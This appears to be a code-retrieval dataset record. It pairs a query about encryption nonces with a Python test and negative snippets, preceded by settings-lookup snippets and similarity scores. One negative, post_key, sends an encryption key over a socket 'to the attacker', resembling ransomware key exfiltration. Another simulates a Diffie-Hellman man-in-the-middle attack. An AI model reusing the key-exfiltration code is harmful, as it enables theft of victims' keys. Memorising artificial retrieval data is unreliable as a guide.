[ "def default(self, key):\r\n return self.inherited_settings[key.field_name]", "def get(self, key, default=None):\n return self.settings.get(key, default)", "def initial(self):\n from setman import settings\n return getattr(settings, self.name, self.default)", "def get_setting_default(cls, key, **kwargs):\n setting = cls.get_setting_definition(key, **kwargs)\n\n return setting.get('default', '')", "def get_setting(self, key, default=NOT_SET):\n if key in self.settings:\n return self.settings[key]\n app_key = 'tangled.app.' + key\n if app_key in self.settings:\n return self.settings[app_key]\n if default is NOT_SET:\n raise KeyError(\"'{}' not present in settings\".format(key))\n return default", "def get_setting_value(self, key, default = None):\n \n if not \"settings\" in self.configuration or not key in self.configuration['settings']:\n return default\n \n return self.configuration['settings'][key]", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"stitch\":\n return \"NewStitch\"\n return key", "def get(self, key, default=None):", "def get(self, key, default=None):\n pass", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"Dinosaur\":\n return \"NewDinosaur\"\n return key", "def get(self, id, key, default=None):\n try:\n id_settings = self.id_dict[id]\n val = id_settings[key]\n except KeyError:\n try:\n val = self.default_settings[key]\n except KeyError:\n val = default\n return val", "def get(self, key, default):\n return self.plugin.get(key, default)", "def get(self, key, default=None):\n try:\n val = self._store.get(key)\n except KeyError:\n val = default\n if val is None and not default:\n return self._auto_prompt(key)\n return val", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"Dinosaur\":\n return None\n return key", "def get(self, name, default=''):\n return getattr(settings, name, DEFAULT_SETTINGS.get(name, default))", "def getKey( self, key ):\n if key in self.conf:\n return self.conf[key]\n else:\n return None", "def get(self, key, default=None):\n if key in self:\n return self[key]\n return default", "def get(self, key, default=None):\n return self[key] if key in self else default", "def get(self, key, default=None):\n try:\n return self[key]\n except KeyError:\n return default", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"id\":\n return \"Id\"\n return key", "def get(self, key, default=None):\r\n try:\r\n return self[key]\r\n except KeyError:\r\n return default", "def get(self, key, default=None):\n raise NotImplementedError()", "def get(cls, key: EnumKeyType, default: EnumKeyType = None) -> str:\n try:\n return cls[key]\n except KeyError:\n return default", "def get_sublime(self, key, default=None):\n return self.sublime_settings.get(key, default)", "def get(key, default=None):\n config = _get_config_dict()\n return config.get(key, default)", "def get(self, key, default=None):\n try:\n return self.context.get(self.prefix+'.'+key, default)\n except AttributeError:\n return default", "def get_setting(setting_name, default=None):\n settings_dict = getattr(settings, 'SIMPLE_FORUMS', None)\n\n if settings_dict:\n return settings_dict.get(setting_name, default)\n\n return default", "def get(self, key, default=None):\n return self.get_models().get(str(key), default)", "def default_value(self):\n return self.__class__.get_setting_default(self.key, **self.get_kwargs())", "def get(self, key, default=None):\n try:\n return self._get(key)\n except Exception:\n return default", "def get(self, key: str, default=None) -> Any:\n try:\n return self[key][0]\n except KeyError:\n return default", "def get_default(self):\n\n\t\treturn self.__default", "def get_option(self, key, default=None):\n current_profile = \"profiles.{}.{}\".format(self.get_profile(), key)\n global_profile = \"profiles.global.{}\".format(key)\n return self.__get_option__(current_profile, self.__get_option__(global_profile, default))", "def getDefault():", "def get_dictionary_default(path):\n if path in defaults_dict.keys():\n return defaults_dict[path]\n else:\n return ''", "def Default():\n return _DEFAULT", "def get(self, key, default=0):\n try:\n return self[key]\n except KeyError:\n return default", "def get(self, key, default=''):\n key = self.optionxform(key)\n cached = self._cache.get(key, _use_default)\n if cached is not _use_default:\n return cached\n name_str = self.name\n key_str = to_unicode(key)\n settings = ProductSetting.select(self.env,\n where={'product': self.product,\n 'section': name_str,\n 'option': key_str})\n if len(settings) > 0:\n value = settings[0].value\n else:\n for parent in self.config.parents:\n value = parent[self.name].get(key, _use_default)\n if value is not _use_default:\n break\n else:\n if default is not _use_default:\n option = Option.registry.get((self.name, key))\n value = option.default if option else _use_default\n else:\n value = _use_default\n if value is _use_default:\n return default\n if not value:\n value = u''\n elif isinstance(value, basestring):\n value = to_unicode(value)\n self._cache[key] = value\n return value", "def get(self, keyname: str, default: Optional[Any] = None) -> Any:\n try:\n return self[keyname]\n except KeyError:\n return default", "def default(self, key):\n raise KeyError(repr(key))", "def getSetting(self,section,key,default=None):\n section,key = map(bolt.LString,(section,key))\n settings = self.getSettings()\n if section in settings:\n return settings[section].get(key,default)\n else:\n return default", "def setting(name, default=None):\n return getattr(settings, name, default)", "def _get_simple_default_value(simple):\n return _SIMPLE_DEFAULT_VALUES[simple]", "def get(self, key):\n try:\n if key == key.upper():\n return self.config[key]\n return self.options[key]\n except KeyError:\n return None", "def default_value(self, key: str) -> Any:\n return _ba.get_appconfig_default_value(key)", "def get(self, key, default=None):\n return self._d.get(key, default)", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def key(self) -> Optional[str]:\n return pulumi.get(self, \"key\")", "def getKey(kwargs,key,default=None):\n value = kwarg.get(key,default)\n if value==None:\n return default\n return value", "def setdefault(self, key):\n pass", "def get_default(name, value):\n return os.environ.get('EXAMPLE_{}'.format(name.upper()), value)", "def default(self):\n return self.get(name='Unknown')", "def default():\n return DefaultSwh.default()", "def get(self, key, default_val=None):\n if key not in self._config.keys(): # we don't want KeyError\n return default_val # just return None if not found\n return self._config[key]", "def get_setting_definition(cls, key, **kwargs):\n settings = kwargs.get('settings', cls.SETTINGS)\n\n key = str(key).strip().upper()\n\n if settings is not None and key in settings:\n return settings[key]\n else:\n return {}", "def get(self, key: str, default: Any = None) -> Any:\n try:\n return getattr(self, key)\n except AttributeError:\n return default", "def get(self, key: str, default: Optional[Any] = None) -> Any:\n raise NotImplementedError", "def get(self, key: str, default: Union[str, T] = '') -> Union[str, T]:\n key = key.casefold()\n for k in self._keys:\n if k.casefold() == key:\n return self._keys[k]\n else:\n return default", "def opt(self, key, default=False):\n if key not in self.options:\n return default\n return self.options.get(key)", "def get(self, name):\n try:\n return self._defaults[name]\n except KeyError:\n raise UndefinedDefault(\"default %s is undefined\" % name)", "def setdefault_key_value(self):\n raise NotImplementedError", "def get_global(self, key, default=None, as_tuple=False):\n if as_tuple:\n return (self.get_global(key, default, as_tuple=False), True)\n else:\n return self.settings.get(key, default)", "def get(self, key, default=None):\n result = self._get_raw_input().get(key, default)\n return result[0] if isinstance(result, list) else result", "def GetSetting(appname, section, key, default=None):\n settings = _OptionsDB(appname)\n try:\n return settings[section, key]\n except config.configparser.Error:\n if default is not None:\n return default\n raise", "def TeXKey(self, default=None):\n return self.data.get('texkey', default)", "def load_key():", "def setdefault(self, key: str, default: Any = None) -> Any:\n try:\n return self[key]\n except KeyError:\n self[key] = default\n return self[key]", "def get(self, metakey, default=None):\n if metakey in self:\n return self[metakey]\n return default", "def get_default_access_key_id():\n access_key_id_script = AWS_ACCOUNTS['default'].ACCESS_KEY_ID_SCRIPT.get()\n return access_key_id_script or get_s3a_access_key()", "def getcfg(self, key, default=None):\n return self._config.get(key, default)", "def get(self, key, default=None):\n try:\n return self.__getitem__(key)\n except ValueError:\n if default is not None:\n return default\n else:\n raise", "def get(self, key, default=None):\n return self.metadata_dict.get(key, default)", "def get(self, key, default=None):\n return self.data.get(key, default)", "def get(self, key, default=None):\n return self.data.get(key, default)", "def get_from_environ(key: str, default: Any = None) -> str:\n return os.environ.get(key, default)" ]
[ "0.7820905", "0.76434904", "0.7315344", "0.7273974", "0.7266542", "0.7164663", "0.708993", "0.7069916", "0.7067126", "0.70258087", "0.70121825", "0.69252306", "0.686531", "0.6851818", "0.6849022", "0.6843253", "0.678574", "0.6693812", "0.66881984", "0.664332", "0.6612321", "0.6610823", "0.6604265", "0.65919226", "0.65308213", "0.6520606", "0.65183884", "0.65071595", "0.6506874", "0.6498181", "0.6491904", "0.6483908", "0.64564943", "0.6451418", "0.6442761", "0.64354736", "0.64316875", "0.6429961", "0.64269054", "0.6421008", "0.6418649", "0.64052576", "0.64047796", "0.639343", "0.63873017", "0.63833815", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.6350485", "0.63468194", "0.63334274", "0.63232225", "0.63205796", "0.63046205", "0.6303444", "0.6299824", "0.6281038", "0.6248287", "0.6246647", "0.6237095", "0.62338537", "0.6232617", "0.619575", "0.61891294", "0.6182222", "0.61795634", "0.6178773", "0.61645335", "0.6162935", "0.61598754", "0.61508507", "0.6146326", "0.61368436", "0.61368436", "0.6136821" ]
0.0
-1
It does not produce the same message using the same key.
def test_encrypt_nonce(self): key = b'0' * 32 message = 'message' assert encrypt(message, key=key) != encrypt(message, key=key)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_rekey(self):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n old_encrypted = encrypt('message', key=old_key)\n new_encrypted = rekey(old_encrypted, old_key=old_key, new_key=new_key)\n\n assert decrypt(new_encrypted, key=new_key) == 'message'", "def create_key(message, key):\n if len(key) > len(message):\n return key[0:len(message)]\n new_key = key * int(len(message)/len(key))\n new_key += key[0:len(message) - len(new_key)]\n return new_key", "def unique_by_key(self, check_message: Optional[str]) -> Tuple[str, ...]:\n return (check_message or self.message,)", "def test_rekey_defaults(self, settings):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n settings.CHITON_ENCRYPTION_KEY = new_key\n settings.CHITON_PREVIOUS_ENCRYPTION_KEY = old_key\n\n encrypted = encrypt('message', key=old_key)\n rekeyed = rekey(encrypted)\n\n assert decrypt(rekeyed) == 'message'", "def test_rekey_non_encrypted(self):\n with pytest.raises(EncryptionError):\n rekey('message', old_key=b'0' * 32, new_key=b'1' * 32)", "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def test_key_type(self):\n self.failureResultOf(self.producer.send_messages(\"topic\", key=\"key\", msgs=[b\"msg\"]), TypeError)", "def _newKey(self, key):\n pass", "def test_duplicate_key_identifier(self):\n bundle = self._load_bundle_from_file(\n \"ksr-root-2016-q3-0.xml\", \"a6b6162e-b299-427e-b11b-1a8c54a08910\"\n )\n new_key = Key(\n key_identifier=list(bundle.keys)[0].key_identifier,\n key_tag=4711,\n ttl=1978,\n flags=256,\n protocol=3,\n algorithm=AlgorithmDNSSEC.RSASHA1,\n public_key=base64.b64encode(b\"test key\"),\n )\n bundle.keys.add(new_key)\n # test that the signature no longer validates\n with self.assertRaises(ValueError):\n validate_signatures(bundle)", "def __init__(self, output_key: bytes, input_key: bytes) -> None:\n super().__init__(output_key, input_key)\n self.send_seqno = randrange(0x100000000, 0x1FFFFFFFF)", "def genKey(self, otherKey):\n self.sharedSecret = self.genSecret(self.privateKey, otherKey)\n #print(\"Shared secret:\")\n #print(self.sharedSecret)\n s = hashlib.sha256()\n s.update(bytes(str(self.sharedSecret).encode()))\n self.key = s.digest()", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def main():\n\n prime = 0xffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece45b3dc2007cb8a163bf0598da48361c55d39a69163fa8fd24cf5f83655d23dca3ad961c62f356208552bb9ed529077096966d670c354e4abc9804f1746c08ca237327ffffffffffffffff\n base = 2\n \n connection = diffiehellman_mitm_sim(prime, base)\n\n # intercept alices public key\n prime, base , _ = next(connection)\n\n # send prime instead of alices public key to bob. Recieve Bobs public key, \n # which we forget as it is not needs. The shared kill will be 0.\n\n connection.send((prime, base, prime))\n\n #Send prime as bob's public key to alice. We have ensured that the shared\n #hared secret key is 0. Recieve Alice's ciphertext for bob\n ciphertext_a2b = connection.send(prime)\n\n # decrypt\n malcolm = AES_CBC(SHA1(bso.int_to_bytes(0)).digest()[:16], b'0'*16)\n messages = []\n messages.append(bso.remove_padding_pkcs7(malcolm.decrypt(ciphertext_a2b[:-16], ciphertext_a2b[-16:])))\n\n #Send the ciphertext to bob. Recieve his response\n ciphertext_b2a = connection.send(ciphertext_a2b)\n\n messages.append(bso.remove_padding_pkcs7(malcolm.decrypt(ciphertext_b2a[:-16], ciphertext_b2a[-16:])))\n\n assert messages[0] == b'Message to Bob'\n assert messages[1] == b'Message to Alice'\n\n \n return", "def repeating_key_xor(msg_b, key_b):\n l = len(key_b)\n return bytes(key_b[n % l] ^ c_i for n, c_i in enumerate(msg_b))", "def _eq_key(self):\n return super(UpdateMessage, self)._eq_key + (self.previous_payload,)", "def corrupt(self, key):\n rand_bytes = random.getrandbits(8)\n byte_str = bytes([rand_bytes])\n self.client[key] = byte_str\n print('Corrupted %s in redis' % key)", "def message_for_key(self, key, context):\n raise NotImplementedError('message_for_key() should have been replaced by a metaclass')", "def generate_key():\n # generate random key\n key = get_random_string()\n\n # if it's already taken, generate another\n if EmailManager.objects.filter(key=key).exists():\n return EmailManager.generate_key()\n\n # return it\n return key", "def shared_key(private_key,public_key):\n\treturn private_key.exchange(public_key)", "def test_producer_send_messages_keyed_same_partition(self):\n first_part = 43\n second_part = 55\n client = Mock(reactor=MemoryReactorClock())\n client._api_versions = 0\n ret1 = Deferred()\n client.send_produce_request.side_effect = [ret1]\n client.topic_partitions = {self.topic: [first_part, second_part]}\n client.metadata_error_for_topic.return_value = False\n msgs1 = [self.msg(\"one\"), self.msg(\"two\")]\n msgs2 = [self.msg(\"odd_man_out\")]\n msgs3 = [self.msg(\"three\"), self.msg(\"four\")]\n key1 = b\"99\"\n key3 = b\"foo\"\n ack_timeout = 5\n\n # Even though we're sending keyed messages, we use the default\n # round-robin partitioner, since the requests are easier to predict\n producer = Producer(client, ack_timeout=ack_timeout, batch_send=True, batch_every_n=4)\n d1 = producer.send_messages(self.topic, key=key1, msgs=msgs1)\n d2 = producer.send_messages(self.topic, msgs=msgs2)\n d3 = producer.send_messages(self.topic, key=key3, msgs=msgs3)\n # Check the expected request was sent\n msgSet1 = create_message_set(\n [\n make_send_requests(msgs1, key=key1)[0],\n make_send_requests(msgs3, key=key3)[0],\n ],\n producer.codec,\n )\n msgSet2 = create_message_set(make_send_requests(msgs2), producer.codec)\n req1 = ProduceRequest(self.topic, first_part, msgSet1)\n req2 = ProduceRequest(self.topic, second_part, msgSet2)\n # Annoying, but order of requests is indeterminate...\n client.send_produce_request.assert_called_once_with(\n ANY, acks=producer.req_acks, timeout=ack_timeout, fail_on_error=False\n )\n self.assertEqual(sorted([req1, req2]), sorted(client.send_produce_request.call_args[0][0]))\n # Check results when \"response\" fires\n self.assertNoResult(d1)\n self.assertNoResult(d2)\n self.assertNoResult(d3)\n resp = [\n ProduceResponse(self.topic, first_part, 0, 10),\n ProduceResponse(self.topic, second_part, 0, 23),\n ]\n ret1.callback(resp)\n result = self.successResultOf(d1)\n self.assertEqual(result, resp[0])\n result = self.successResultOf(d2)\n self.assertEqual(result, resp[1])\n result = self.successResultOf(d3)\n self.assertEqual(result, resp[0])\n producer.stop()", "def generate_keystream(self):", "def test_producer_send_messages_keyed(self):\n first_part = 43\n second_part = 56\n client = Mock(reactor=MemoryReactorClock())\n client._api_versions = 0\n ret1 = Deferred()\n client.send_produce_request.side_effect = [ret1]\n client.topic_partitions = {self.topic: [first_part, second_part, 102]}\n client.metadata_error_for_topic.return_value = False\n msgs1 = [self.msg(\"one\"), self.msg(\"two\")]\n msgs2 = [self.msg(\"three\"), self.msg(\"four\")]\n key1 = b\"35\"\n key2 = b\"foo\"\n ack_timeout = 5\n\n # Even though we're sending keyed messages, we use the default\n # round-robin partitioner, since the requests are easier to predict\n producer = Producer(client, ack_timeout=ack_timeout, batch_send=True, batch_every_n=4)\n d1 = producer.send_messages(self.topic, key=key1, msgs=msgs1)\n d2 = producer.send_messages(self.topic, key=key2, msgs=msgs2)\n # Check the expected request was sent\n msgSet1 = create_message_set(make_send_requests(msgs1, key=key1), producer.codec)\n msgSet2 = create_message_set(make_send_requests(msgs2, key=key2), producer.codec)\n req1 = ProduceRequest(self.topic, first_part, msgSet1)\n req2 = ProduceRequest(self.topic, second_part, msgSet2)\n # Annoying, but order of requests is indeterminate...\n client.send_produce_request.assert_called_once_with(\n ANY, acks=producer.req_acks, timeout=ack_timeout, fail_on_error=False\n )\n self.assertEqual(sorted([req1, req2]), sorted(client.send_produce_request.call_args[0][0]))\n # Check results when \"response\" fires\n self.assertNoResult(d1)\n self.assertNoResult(d2)\n resp = [\n ProduceResponse(self.topic, first_part, 0, 10),\n ProduceResponse(self.topic, second_part, 0, 23),\n ]\n ret1.callback(resp)\n result = self.successResultOf(d1)\n self.assertEqual(result, resp[0])\n result = self.successResultOf(d2)\n self.assertEqual(result, resp[1])\n producer.stop()", "def post_key(self):\n # print(self.key)\n #Sending the key to the attacker.\n s.send(bytes(\"K\\n{}\".format(str(self.key,'utf-8')),'utf-8'))", "def testStreamKeying1(self):\n\n yield self.connect(self.get_body_node(connect=True, useKey=True))\n yield self.proxy.send(self.get_body_node(useKey=True))\n yield self.proxy.send(self.get_body_node(useKey=True))", "def newKeyGenerate():\n generate()\n return '', 204", "def test_get(self):\n key = self.key_gen.get()\n key2 = self.key_gen.get()\n\n self.assertEqual(key, key2 - 1)", "def create_key ():", "def recipient_public_key(self):", "def main():\n # key = random(1024)\n # ciphertexts = [encrypt(key, msg) for msg in MSGS]\n\n # Get key and secret message\n knownPlain2 = \"The nice thing about Keeyloq is now we cryptographers can drive a lot of fancy cars - Dan Boneh\"\n key = strxor(ciphertexts[2], knownPlain2)\n secret = strxor(target, key)\n\n print \"Key: \" + key\n print \"Key (Hex): \" + key.encode(\"hex\")\n print \"Secret: \" + secret", "def keyEquivalent( self ):\n\t\treturn None", "def messagetokeystring(message, keydict):\r\n return ''.join([' ' + str(keydict[char])\r\n if i - 1 >= 0\r\n and str(keydict[char])[0]\r\n == str(keydict[message[i - 1]])[0]\r\n else str(keydict[char])\r\n for i, char in enumerate(message)])", "def receive_key(self, key):\n try:\n self.queue.put(key)\n except:\n raise #Just collecting possible exceptions for now", "def key():", "def receive_key(self, key):\n self.queue.put(key)", "def encrypt_message(message,public_key,symetric_key):\n\tif message != None:\n\t\tnonce = os.urandom(12)\n\t\tmessage = AESCCM(symetric_key).encrypt(nonce,message.encode(\"iso-8859-1\"),None)\n\t\tnonce, *_ = encrypt(public_key,nonce)\n\t\tmessage ={'nonce' : nonce.decode(\"iso-8859-1\"),'message':message.decode(\"iso-8859-1\")}\n\n\treturn message", "def __init__(self, encoded_message, key):\n self.encoded_message = encoded_message\n self.key = key", "def testCryptMessageRoundtrip(self):\n try:\n cu = CryptUtils()\n ky = cu.newKey()\n msg = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\\n\"\n encMsg = cu.encryptMessage(msg, ky)\n dcrMsg = cu.decryptMessage(encMsg, ky)\n self.assertEqual(msg, dcrMsg)\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()", "def add_message(messages, key, message):\n if key in messages:\n messages[key].append(message)\n else:\n messages[key] = [message]", "def __hash__(self):\n return hash(str(self.key))", "def __hash__(self):\n return hash(str(self.key))", "def generate_key(row: int, message: bitarray, offset: int):\n row = \"R\" + str(row)\n length = \"L\" + str(len(message))\n offset = \"O\" + str(offset)\n key = []\n key.extend([row, length, offset])\n random.shuffle(key)\n print(f\"Key: {''.join(key)}\")", "def dh_encrypt(pub, message):\n \n Group, private, public = dh_get_key()#generate new DH pair for Alice\n #private key is an integer/scalar and public key is a point on the curve \n \n #check whether public key of Bob is valid and on curve \n assert Group.check_point(pub)\n \n #Alice obtains shared secret by multiplying her private key with bob's forwarded public key\n key = pub.pt_mul(private)#dA* qB\n print \"key from enc is\", key\n \n hashedKey=sha256(key.export()).digest()\n\n \n plaintext = message.encode(\"utf8\")#encode message\n aes = Cipher(\"aes-128-gcm\")#select cipher\n iv = urandom(16)#generate initialization vector \n cipher, tag = aes.quick_gcm_enc(hashedKey[:16], iv, plaintext)#encrypt using shared key \n ciphertext = [iv,cipher,tag,public]\n\n return ciphertext", "def _fake_message_compare(m1, m2):\r\n m1 = m1.serialize()\r\n m2 = m2.serialize()\r\n diff = False\r\n for i in range(len(m1)):\r\n if m1[i] is None:\r\n continue\r\n if m1[i] != m2[i]:\r\n diff = True\r\n break\r\n return not diff", "def _get_raw_key(self, key_id):", "def _deduplicate_message(self, message):\n\n key = (message.remote, message.mid)\n if key in self._recent_messages:\n if message.mtype is CON:\n if self._recent_messages[key] is not None:\n self.log.info('Duplicate CON received, sending old response again')\n # not going via send_message because that would strip the\n # mid and might do all other sorts of checks\n self._send_initially(self._recent_messages[key])\n else:\n self.log.info('Duplicate CON received, no response to send yet')\n else:\n self.log.info('Duplicate NON, ACK or RST received')\n return True\n else:\n self.log.debug('New unique message received')\n self.loop.call_later(message.transport_tuning.EXCHANGE_LIFETIME, functools.partial(self._recent_messages.pop, key))\n self._recent_messages[key] = None\n return False", "def test_decrypt_key(self):\n key = b'0' * 32\n\n encrypted = encrypt('message', key=key)\n assert decrypt(encrypted, key=key) == 'message'", "def __init__(self, key, msg0503):\n enkey1 = map(ord, AES.new(key).encrypt(msg0503[:16]))\n self.cipher = AES.new(\"\".join(\n map(chr, (enkey1[i] ^ ord(msg0503[i + 16]) for i in range(16)))))\n self.encrypt_seq = random.randint(0, 0xffff)", "def test_envelope_echoed_back(self):\n addr_1 = self.connection_client_1.address\n addr_2 = self.connection_client_2.address\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n original_envelope = Envelope(\n to=addr_2,\n sender=addr_1,\n protocol_specification_id=DefaultMessage.protocol_specification_id,\n message=DefaultSerializer().encode(msg),\n )\n\n self.multiplexer_client_1.put(original_envelope)\n delivered_envelope = self.multiplexer_client_2.get(block=True, timeout=10)\n assert delivered_envelope is not None\n\n delivered_envelope.to = addr_1\n delivered_envelope.sender = addr_2\n\n self.multiplexer_client_2.put(delivered_envelope)\n echoed_envelope = self.multiplexer_client_1.get(block=True, timeout=5)\n\n assert echoed_envelope is not None\n assert echoed_envelope.to == original_envelope.sender\n assert delivered_envelope.sender == original_envelope.to\n assert (\n delivered_envelope.protocol_specification_id\n == original_envelope.protocol_specification_id\n )\n assert delivered_envelope.message == original_envelope.message", "def test_envelope_echoed_back(self):\n addr_1 = self.connection_client_1.address\n addr_2 = self.connection_client_2.address\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n original_envelope = Envelope(\n to=addr_2,\n sender=addr_1,\n protocol_specification_id=DefaultMessage.protocol_specification_id,\n message=DefaultSerializer().encode(msg),\n )\n\n self.multiplexer_client_1.put(original_envelope)\n delivered_envelope = self.multiplexer_client_2.get(block=True, timeout=10)\n assert delivered_envelope is not None\n\n delivered_envelope.to = addr_1\n delivered_envelope.sender = addr_2\n\n self.multiplexer_client_2.put(delivered_envelope)\n echoed_envelope = self.multiplexer_client_1.get(block=True, timeout=5)\n\n assert echoed_envelope is not None\n assert echoed_envelope.to == original_envelope.sender\n assert delivered_envelope.sender == original_envelope.to\n assert (\n delivered_envelope.protocol_specification_id\n == original_envelope.protocol_specification_id\n )\n assert delivered_envelope.message == original_envelope.message", "def key():\n pass", "def key():\n pass", "async def test_preserved_other_overwrites_text(self):\n prev_overwrite_dict = dict(self.text_overwrite)\n await self.cog._set_silence_overwrites(self.text_channel)\n new_overwrite_dict = dict(self.text_overwrite)\n\n # Remove related permission keys because they were changed by the method.\n for perm_name in (\n \"send_messages\",\n \"add_reactions\",\n \"create_private_threads\",\n \"create_public_threads\",\n \"send_messages_in_threads\"\n ):\n del prev_overwrite_dict[perm_name]\n del new_overwrite_dict[perm_name]\n\n self.assertDictEqual(prev_overwrite_dict, new_overwrite_dict)", "def encodeMessage(self, key, message):\n # Make sure pure ascii, and replace bullshit\n message = message.encode('ascii', 'replace')\n # Any message needs to be a multiple of 8.\n dsize = len(message)\n #message = struct.pack('!q', int(binascii.crc32(message)& 0xffffffff)) + struct.pack('!q', dsize) + message\n # Encode two dsize parity blocks and check them against eachother on the receiving end\n message = struct.pack('!q', dsize) + struct.pack('!q', dsize) + message\n key = self.createKey(key)\n short = (math.ceil(len(message)/8.0) * 8) - len(message)\n space = \"\\x00\" * int(short)\n enc = DES.new(key, DES.MODE_ECB)\n return enc.encrypt(message+space)", "def generate_random_key(self):\n self.key = ''.join(choice(ascii_letters + digits) for i in range(300))", "def testGetSquashNoKeyOverlap(self):\n\n # Assuming proxy's downstream_max is 1,\n # and number of threads is 1.\n\n self.client_connect(0)\n self.client_connect(1)\n self.client_connect(2)\n\n self.client_send('get cork0\\r\\n', 0)\n self.mock_recv('get cork0\\r\\n', 0)\n\n # Mock server is 'busy' at this point, so\n # any client sends should be able to be\n # de-duplicated by the proxy.\n\n self.client_send('get a\\r\\n', 1)\n self.client_send('get x\\r\\n', 2)\n\n self.wait(10)\n\n self.mock_send('END\\r\\n', 0)\n self.client_recv('END\\r\\n', 0)\n\n self.mock_recv('get a x\\r\\n', 0)\n self.mock_send('VALUE a 0 1\\r\\na\\r\\n', 0)\n self.mock_send('VALUE x 0 1\\r\\nx\\r\\n', 0)\n self.mock_send('END\\r\\n', 0)\n\n self.client_recv('VALUE a 0 1\\r\\na\\r\\n' +\n 'END\\r\\n', 1)\n self.client_recv('VALUE x 0 1\\r\\nx\\r\\n' +\n 'END\\r\\n', 2)", "def hash_code(sender: Key.__class__, **kwargs):\n new_key = kwargs['instance']\n new_key.code = randint(MIN_CODE, MAX_CODE)\n new_key.hash_code = sha1(str(new_key.code).encode('utf-8')).hexdigest()", "def _eq_key(self):\n return (\n self.message_type,\n self.topic,\n self.schema_id,\n self.payload,\n self.uuid,\n self.timestamp,\n self.upstream_position_info,\n self.kafka_position_info,\n self.dry_run,\n self.encryption_type\n )", "def test_create_key():\n\n assert symmetric.create_key() != \"\"", "def problem1(bob, message):\n \"\"\"\n 1. Generate a sufficiently large random key; the key must be at least 5\n times the length of the message and on average half of bobs guess\n filters will be wrong\n 2. Get the filters bob used by using bob.quantum_channel(data)\n 3. Create the list of correct filters sent and figure out which filters\n Bob used correctly\n 4. Tell Bob which filters he guessed incorrectly and should remove\n 5. Create the key and to make sure it's >= 5*len(message) and shorten the\n key to 5*len(message) if it is currently longer\n 6. Call otp_encrypt(key, message) to encrypt the message and then use\n bob.message(ciphertext) to send Bob the coded message\n \"\"\"\n # raise NotImplemented(\"TODO\")\n \n #1. Generates a key of length: messageLen * a value between 15 and 31.0\n messageLen = len(message)\n allPhotons = []\n allFilters = []\n correctPhotons = 0\n\n while correctPhotons < messageLen*5:\n\n photons = generatePhotons(messageLen)\n #2. \n bobFilters = bob.quantum_channel(photons)\n \n allFilters += bobFilters\n allPhotons += photons\n\n #3.\n disposalInstructions, correctPhotons = validateFilters(allPhotons, allFilters)\n \n if correctPhotons >= messageLen*5:\n\n #4. \n bob.dispose(disposalInstructions)\n #5. \n key = getKey(allPhotons, disposalInstructions, messageLen)\n\n #6. \n ciphertext = otp_encrypt(key, message)\n bob.message(ciphertext)", "def _get_sender_key(self, outer_message, aad, plaintext, request_id):\n return self.sender_key", "def test_long():\n key = 'A' * 242\n hashed_key = '%s[3705915182]' % ('A' * 229)\n full_key = 'prefix:1:%s' % hashed_key\n assert full_key == make_key(key, 'prefix', 1)", "def diffiehellman_mitm_sim(prime, base):\n alice = {}\n\n #Alice generates their public key an sends to 'bob'\n 